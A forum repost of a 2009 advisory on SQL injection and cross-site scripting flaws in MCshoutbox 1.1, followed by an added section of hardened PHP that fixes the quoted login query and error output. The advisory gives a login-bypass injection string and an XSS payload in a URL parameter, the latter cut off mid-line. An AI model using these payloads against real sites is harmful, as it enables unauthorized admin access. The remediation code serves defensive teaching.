Multi Ethnic Hacking Group


    MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities

    Post by Foxi on Thu Jul 23, 2009 4:27 am

    Code:
    ###########################################################################################
    [+] MCshoutbox 1.1 (SQL/XSS/Shell) Multiple Remote Vulnerabilities
    [+] Discovered By SirGod
    [+] http://insecurity-ro.org
    [+] http://h4cky0u.org
    ############################################################################################

    Homepage : http://www.maniacomputer.com/dload/MCshoutbox_Download_Page.html

    [+] SQL Injection Login Bypass

     - Note : magic_quotes_gpc = off

     - Vulnerable code in scr_login.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------
    $admin_name = trim($_REQUEST[ 'username' ]);
    $admin_password = trim($_REQUEST[ 'password' ]);
     connect($host,$username,$password,$database);
    $query = "SELECT * FROM admin_tbl WHERE admin_name = ''or''='' AND
    admin_password = ''or''=''" ;
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------

     - PoC

      URL : http://127.0.0.1/[path]/admin_login.php
      Username : 'or''='
      Password : 'or''='

    [+] Cross-Site scripting

     - Vulnerable code in admin_login.php

    ----------------------------------------------------------------------------------------------------------------------------------------------------------------
    if(isset($loginerror)){ ?>
          <tr>
        <td colspan="2" align="center" style="font-size:18px;
    color:#FFFFFF;" ><?echo $loginerror?></td>
    ----------------------------------------------------------------------------------------------------------------------------------------------------------------

     - PoC

        http://127.0.0.1/[path]/admin_login.php?loginerror=<script>alert(document
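Hardened counterparts of the two code paths quoted in the advisory, as an added example that is not part of the original post or of the MCshoutbox code. It assumes PDO with an in-memory SQLite database standing in for the application's database and passwords stored with password_hash(); `check_login` and `render_login_error` are hypothetical names, and all inputs are constructed.

```php
<?php
// Added example: fixes for the login query and the login error output.
// Constructed setup: in-memory SQLite stands in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin_tbl (admin_name TEXT PRIMARY KEY, admin_password TEXT)');
$ins = $db->prepare('INSERT INTO admin_tbl (admin_name, admin_password) VALUES (?, ?)');
// Assumption: passwords are stored as password_hash() output, not plaintext.
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Login check: user input is bound as data, never concatenated into the SQL text,
// so quotes in the input cannot change the structure of the WHERE clause.
function check_login(PDO $db, string $name, string $password): bool
{
    $stmt = $db->prepare('SELECT admin_password FROM admin_tbl WHERE admin_name = :name');
    $stmt->execute([':name' => $name]);
    $hash = $stmt->fetchColumn();
    // fetchColumn() returns false when no row matches.
    return is_string($hash) && password_verify($password, $hash);
}

// Output encoding for the login error cell in admin_login.php:
// markup characters in the message are emitted as entities, not as HTML.
function render_login_error(string $loginerror): string
{
    $safe = htmlspecialchars($loginerror, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<td colspan="2" align="center">' . $safe . '</td>';
}

// Constructed inputs: the advisory's login strings plus one valid credential pair.
$bypass = "'or''='";
var_dump(check_login($db, $bypass, $bypass));
var_dump(check_login($db, 'admin', 'constructed-sample-pw'));
var_dump(check_login($db, 'admin', $bypass));
echo render_login_error('<script>alert(1)</script>'), "\n";
```

Because the query is parameterized, the result no longer depends on magic_quotes_gpc, which the advisory lists as a precondition.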
